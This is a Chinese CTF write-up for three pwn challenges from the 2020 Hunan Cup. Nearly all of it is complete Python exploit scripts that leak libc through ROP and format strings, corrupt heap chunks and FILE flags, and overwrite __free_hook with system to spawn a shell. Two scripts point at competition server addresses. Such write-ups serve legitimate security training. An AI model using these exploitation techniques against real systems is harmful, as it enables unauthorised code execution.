2020 湖湘杯 pwn题解
2020-11-5 00:13 6292
2020 湖湘杯 pwn题解
pwn_printf
简单的栈溢出（ret2libc）：先用 ROP 调用 puts(puts@got) 泄露 libc 基址，再次溢出时把返回地址改为 one_gadget 拿 shell。脚本中的 libc 偏移只对题目所用的 libc 有效。
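#https://github.com/matrix1001/welpwn
"""2020 Hunan Cup - pwn_printf: ret2libc over a plain stack overflow.

Stage 1 sends a ROP chain that calls puts(puts@got) to leak the libc
address of puts and then returns to 0x40117F (presumably back into the
vulnerable function so a second overflow can be sent - TODO confirm).
Stage 2 overwrites the return address with a one_gadget.

All libc offsets below are for the challenge's libc and must be
re-derived for any other build; the script refuses to continue when the
computed base is not page aligned, which is the usual symptom of a wrong
offset.
"""
from PwnContext import *
try:
    from IPython import embed as ipy
except ImportError:
    print('IPython not installed.')

if __name__ == '__main__':
    context.terminal = ['tmux', 'splitw', '-h']
    context.log_level = 'debug'

    # --- short-hands over the welpwn context (str() so ints can be sent) ---
    s = lambda data: ctx.send(str(data))
    sa = lambda delim, data: ctx.sendafter(str(delim), str(data))
    sl = lambda data: ctx.sendline(str(data))
    sla = lambda delim, data: ctx.sendlineafter(str(delim), str(data))
    r = lambda numb=4096: ctx.recv(numb)
    ru = lambda delims, drop=True: ctx.recvuntil(delims, drop)
    irt = lambda: ctx.interactive()
    rs = lambda *args, **kwargs: ctx.start(*args, **kwargs)
    dbg = lambda gs='', **kwargs: ctx.debug(gdbscript=gs, **kwargs)
    # unpack a partial (4/8 byte) little-endian value, zero-padded on the right
    uu32 = lambda data: u32(data.ljust(4, '\0'))
    uu64 = lambda data: u64(data.ljust(8, '\0'))

    # --- target configuration ---
    ctx.binary = './pwn'
    #ctx.custom_lib_dir = '/home/iddm/glibc-all-in-one/libs/2.27-3ubuntu1_amd64'
    ctx.remote = ('47.111.104.99', 52206)
    #ctx.remote_libc = './libc.so'
    #ctx.debug_remote_libc = True
    ctx.symbols = {
        'dest': 0x4000000,
    }
    ctx.breakpoints = [0x0401009, 0x40103F, 0x040112E, 0x4007D4]

    # Binary gadgets (no PIE: fixed addresses).
    POP_RDI = 0x0401213
    PUTS_PLT = 0x400640
    PUTS_GOT = 0x603018
    RET_TARGET = 0x40117F
    # libc offsets - valid only for the challenge's libc build.
    PUTS_OFFSET = 0x6f6a0
    ONE_GADGET_OFFSET = 0x4527a

    def lg(tag, addr):
        """Print `tag -> 0x<addr>` highlighted in red on the terminal."""
        print('\033[1;31;40m%20s-->0x%x\033[0m' % (tag, addr))

    #rs()
    rs('remote')
    # Kept from the author's template; against a remote target ctx.debug()
    # is presumably a no-op (nothing local to attach to) - TODO confirm.
    dbg()
    ru('resting\n')
    # Sixteen inputs of '32' before the overflow - presumably walking the
    # program to the vulnerable read; not derivable from this script alone.
    for _ in range(16):
        sl('32')

    # Stage 1: saved rbp (p64(0)), then puts(puts@got), then return to
    # RET_TARGET for a second round.
    chain = [0, POP_RDI, PUTS_GOT, PUTS_PLT, RET_TARGET]
    s(''.join(p64(q) for q in chain))

    # The leaked pointer ends in 0x7f; take its low 6 bytes.
    puts_leak = uu64(ru('\x7f', drop=False)[-6:])
    libc = puts_leak - PUTS_OFFSET
    lg('libc', libc)
    if libc & 0xfff:
        # A wrong PUTS_OFFSET (different libc build) shows up here as a
        # non page-aligned base; fail loudly instead of jumping to garbage.
        raise ValueError('libc base 0x%x is not page aligned - check PUTS_OFFSET' % libc)

    # Stage 2: overwrite the return address with the one_gadget. Only the
    # low 6 bytes are sent - presumably the second read is length-limited
    # and the high zero bytes are already in place; TODO confirm.
    one_gadget = libc + ONE_GADGET_OFFSET
    s('\0' * 8 + p64(one_gadget)[:6])
    irt()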
blend_pwn
利用异常捕获机制绕过 canary 检查并控制 rbp 达成利用；libc 基址通过用户名处的格式化字符串（%3$p）泄露，堆地址通过释放后 show 读取。
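#https://github.com/matrix1001/welpwn
"""2020 Hunan Cup - blend_pwn.

Leak libc through a format string in the user name (`%3$p`, echoed back
after 'Current user:'), fill two notes with a gadget address, free them,
read a heap pointer back via show(), then use the hidden menu entry 666
to send the final overwrite. The libc offsets are specific to the
challenge's libc; the computed base is checked for page alignment before
it is used.
"""
from PwnContext import *
try:
    from IPython import embed as ipy
except ImportError:
    print('IPython not installed.')

if __name__ == '__main__':
    context.terminal = ['tmux', 'splitw', '-h']
    context.log_level = 'debug'

    # --- short-hands over the welpwn context (str() so ints can be sent) ---
    s = lambda data: ctx.send(str(data))
    sa = lambda delim, data: ctx.sendafter(str(delim), str(data))
    sl = lambda data: ctx.sendline(str(data))
    sla = lambda delim, data: ctx.sendlineafter(str(delim), str(data))
    r = lambda numb=4096: ctx.recv(numb)
    ru = lambda delims, drop=True: ctx.recvuntil(delims, drop)
    irt = lambda: ctx.interactive()
    rs = lambda *args, **kwargs: ctx.start(*args, **kwargs)
    dbg = lambda gs='', **kwargs: ctx.debug(gdbscript=gs, **kwargs)
    # unpack a partial (4/8 byte) little-endian value, zero-padded on the right
    uu32 = lambda data: u32(data.ljust(4, '\0'))
    uu64 = lambda data: u64(data.ljust(8, '\0'))

    # --- target configuration ---
    ctx.binary = './pwn'
    ctx.remote = ('47.111.96.55', 53404)
    ctx.symbols = {
        'node': 0x202090,
    }
    ctx.breakpoints = [0x117C, 0x11B8, 0x12C2]

    # libc offsets - valid only for the challenge's libc build.
    LEAK_OFFSET = 0xf7380        # distance of the %3$p value from libc base
    GADGET_OFFSET = 0x45226      # presumably a one_gadget - TODO confirm

    def lg(tag, addr):
        """Print `tag -> 0x<addr>` highlighted in red on the terminal."""
        print('\033[1;31;40m%20s-->0x%x\033[0m' % (tag, addr))

    def add(content='\n'):
        """Menu 2: create a note; `content` is sent raw after the 'note:' prompt."""
        sla('>', 2)
        sa('note:\n', content)

    def delete(idx):
        """Menu 3: free the note at `idx`."""
        sla('>', 3)
        sla('index>', idx)

    def show_name():
        """Menu 1: print the user name (this is where the format string fires)."""
        sla('>', 1)

    def show():
        """Menu 4: list the notes."""
        sla('>', 4)

    #rs()
    rs('remote')
    #dbg()

    # Format-string leak: %3$p is printed back as '0x' + 12 hex digits.
    sla('name: ', '%3$p')
    show_name()
    ru('Current user:')
    leak = int(r(14), 16)
    lg('libc', leak)
    base = leak - LEAK_OFFSET
    if base & 0xfff:
        # A misaligned base means LEAK_OFFSET is wrong for this libc (or
        # %3$p did not hit the expected pointer); stop before spraying it.
        raise ValueError('libc base 0x%x is not page aligned - check LEAK_OFFSET' % base)

    # Spray the gadget address through two notes, then free both.
    gadget_spray = p64(base + GADGET_OFFSET) * 10
    add(gadget_spray + '\n')
    add(gadget_spray + '\n')
    delete(0)
    delete(1)
    # Kept from the author's run; against the remote target ctx.debug()
    # is presumably a no-op - TODO confirm.
    dbg()

    # show() prints the freed notes; the 6 bytes after '2:' are a heap pointer.
    show()
    ru('2:')
    heap = uu64(r(6))
    aim = heap + 0x10
    lg('aim', aim)

    # Menu entry 666 is not in the listed menu; it prompts with 'want' and
    # reads the final payload: 0x20 bytes of filler then a 6-byte pointer
    # (presumably landing on the saved rbp - see the write-up text).
    sla('>', 666)
    sa('want', '0' * 0x20 + p64(aim + 0x20)[:6] + '\n')
    irt()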
only_add
realloc 利用，注意堆布局。脚本通过写入 0xfbad3887（_IO_FILE flags 技巧）泄露 libc，再把 __free_hook 改为 system；由于其中有一次 2 字节的部分地址覆写，外层 while 循环用于在布局失败（EOF）时重试。
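#https://github.com/matrix1001/welpwn
"""2020 Hunan Cup - only_add: realloc-based heap exploit.

The program only offers "add" (menu 1, with size 0 acting as a free via
realloc) and "clear" (menu 2). The script shapes the heap with a long
sequence of sized allocations, corrupts chunk sizes, writes 0xfbad3887
over a FILE flags field to make the program leak a libc pointer, then
overwrites __free_hook with system.

One step is a 2-byte partial pointer overwrite ('\\x1d\\x77'), so the
layout only works for some heap/libc randomisations; the outer loop
restarts the target and retries on EOF. Ctrl-C now leaves the loop
(the original swallowed it and restarted the exploit), and a shell that
was obtained is not retried once interactive mode ends.

The libc offsets (0x3b07e3/0x73, 0x3b18e8, 0x13440) are whatever build
the author targeted; they must be re-derived for any other libc.
"""
from PwnContext import *
try:
    from IPython import embed as ipy
except ImportError:
    print('IPython not installed.')
import time

if __name__ == '__main__':
    context.terminal = ['tmux', 'splitw', '-h']
    context.log_level = 'debug'

    # --- short-hands over the welpwn context (str() so ints can be sent) ---
    s = lambda data: ctx.send(str(data))
    sa = lambda delim, data: ctx.sendafter(str(delim), str(data))
    sl = lambda data: ctx.sendline(str(data))
    sla = lambda delim, data: ctx.sendlineafter(str(delim), str(data))
    r = lambda numb=4096: ctx.recv(numb)
    ru = lambda delims, drop=True: ctx.recvuntil(delims, drop)
    irt = lambda: ctx.interactive()
    rs = lambda *args, **kwargs: ctx.start(*args, **kwargs)
    dbg = lambda gs='', **kwargs: ctx.debug(gdbscript=gs, **kwargs)
    # unpack a partial (4/8 byte) little-endian value, zero-padded on the right
    uu32 = lambda data: u32(data.ljust(4, '\0'))
    uu64 = lambda data: u64(data.ljust(8, '\0'))

    # --- target configuration ---
    ctx.binary = './pwn'
    ctx.custom_lib_dir = '/home/iddm/glibc-all-in-one/libs/2.27-3ubuntu1_amd64'
    #ctx.custom_lib_dir = '/glibc/2.27/amd64/lib'
    #ctx.remote = ('172.16.9.21', 9006)
    #ctx.remote_libc = './libc.so'
    ctx.debug_remote_libc = True
    ctx.symbols = {
        'node': 0x202040,
        'mark': 0x202010,
    }
    ctx.breakpoints = [0xB11]

    # libc offsets - the values do not obviously match the 2.27-3ubuntu1
    # build named in ctx.custom_lib_dir; TODO confirm which libc they are for.
    LEAK_ADJUST = -0x3b07e3 + 0x73
    FREE_HOOK_OFFSET = 0x3b18e8
    SYSTEM_OFFSET = 0x13440
    # Number of chunks needed to fill one tcache bin.
    TCACHE_FILL = 7

    def lg(tag, addr):
        """Print `tag -> 0x<addr>` highlighted in red on the terminal."""
        print('\033[1;31;40m%20s-->0x%x\033[0m' % (tag, addr))

    def add(size, content='\n', mark=0):
        """Menu 1: (re)allocate `size` bytes and send `content` at the 'data:' prompt.

        size == 0 sends no content (the program then has nothing to read).
        mark == 0 synchronises on the prompts; mark == 1 instead paces the
        sends with short sleeps for cases where the prompts are not echoed.
        """
        if mark == 0:
            sla('ice:', 1)
            sla('ize', size)
            if size == 0:
                return
            sa('ta:', content)
        elif mark == 1:
            time.sleep(0.1)
            sl(1)
            time.sleep(0.1)
            sl(size)
            if size == 0:
                return
            time.sleep(0.1)
            sa('ta:', content)

    def add_1(size, content='\n'):
        """Like add(mark=1) but sends `content` raw without waiting for 'data:'.

        Used after the FILE corruption, when the program's prompts can no
        longer be relied on.
        """
        sl(1)
        time.sleep(0.1)
        sl(size)
        time.sleep(0.1)
        if size == 0:
            return
        s(content)
        time.sleep(0.1)

    def clear():
        """Menu 2: the program's clear/reset action; wait for its 'bye' text."""
        sla('ice', 2)
        ru('ye')

    def shape_heap_and_leak():
        """Run the allocation sequence up to the libc leak; return the leaked 8 bytes as an int."""
        for _ in range(TCACHE_FILL):
            add(0xa0)
        add(0x10)
        #dbg()
        add(0x200)
        add(0x200 - 0x20)
        add(0x200 - 0x20 - 0x90)
        # get the unsorted bin
        add(0x200 - 0x20 - 0x90 - 0x30)
        add(0x200 - 0x20 - 0x90 - 0x30 - 0x40)
        add(0)
        # Each `add(N, data); add(0)` pair below writes a fake size byte
        # (0x81, 0xc1, 0x61, 0x71, 0x90 ...) over a neighbouring chunk
        # header and then frees via realloc(0).
        add(0x38, p64(0) * 7 + chr(0x81))
        add(0)
        add(0x20)
        add(0)
        # 2-byte partial overwrite of a pointer: this is the brute-forced step.
        add(0x70, p64(0) * 5 + p64(0xc1) + '\x1d\x77')
        add(0)
        add(0xe8, p64(0) * 29 + chr(0x81))
        add(0)
        add(0x30)
        add(0)
        add(0xe0)
        add(0xe0 - 0x38, p64(0) * 21 + chr(0x61))
        add(0)
        add(0x30)
        add(0)
        add(0x50, p64(0) * 7 + p64(0x71) + chr(0x90))
        add(0)
        add(0x70)
        add(0)
        add(0x70)
        add(0)
        # 0xfbad3887 over a FILE flags field (the _IO_FILE flags trick):
        # the next output then spills libc pointers; the leak ends in 0x7f.
        add(0x70, '\0' * 0x43 + p64(0xfbad3887) + p64(0) * 3 + chr(0x70))
        return uu64(ru('\x7f', drop=False)[-6:])

    while True:
        try:
            context.log_level = 'info'
            rs()
            #rs('remote')

            libc_base = shape_heap_and_leak() + LEAK_ADJUST
            lg('libc_base', libc_base)
            if libc_base & 0xfff:
                # The leak did not land where expected (layout did not
                # line up, or LEAK_ADJUST is for another libc): retry
                # instead of writing a garbage pointer near __free_hook.
                lg('misaligned base, retrying', libc_base)
                continue
            free_hook = libc_base + FREE_HOOK_OFFSET
            system = libc_base + SYSTEM_OFFSET

            clear()
            # Fake a 0xd0 chunk whose fd points just below __free_hook, then
            # allocate through it so the next 0x60 request lands there.
            add_1(0x50, p64(0) * 7 + p64(0xd1) + p64(free_hook - 0x18))
            add_1(0)
            add_1(0x60)
            add_1(0)
            # The command is placed at the start of the chunk and system
            # at +0x18 (= __free_hook). stdout is redirected to stderr,
            # presumably because stdout's FILE was corrupted by the leak.
            cmd = 'exec /bin/sh 1>&2\0'.ljust(0x18, '\0')
            add_1(0x60, cmd + p64(system))
            # free(chunk) -> __free_hook -> system("exec /bin/sh 1>&2")
            add_1(0)
            irt()
            # Interactive session ended: do not restart the exploit.
            break
        except KeyboardInterrupt:
            break
        except EOFError:
            # Target died (layout did not line up this time): start over.
            pass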
当做记录本来想丢到专栏去的,但是专栏排版好像有些问题,就放到这里来凑数。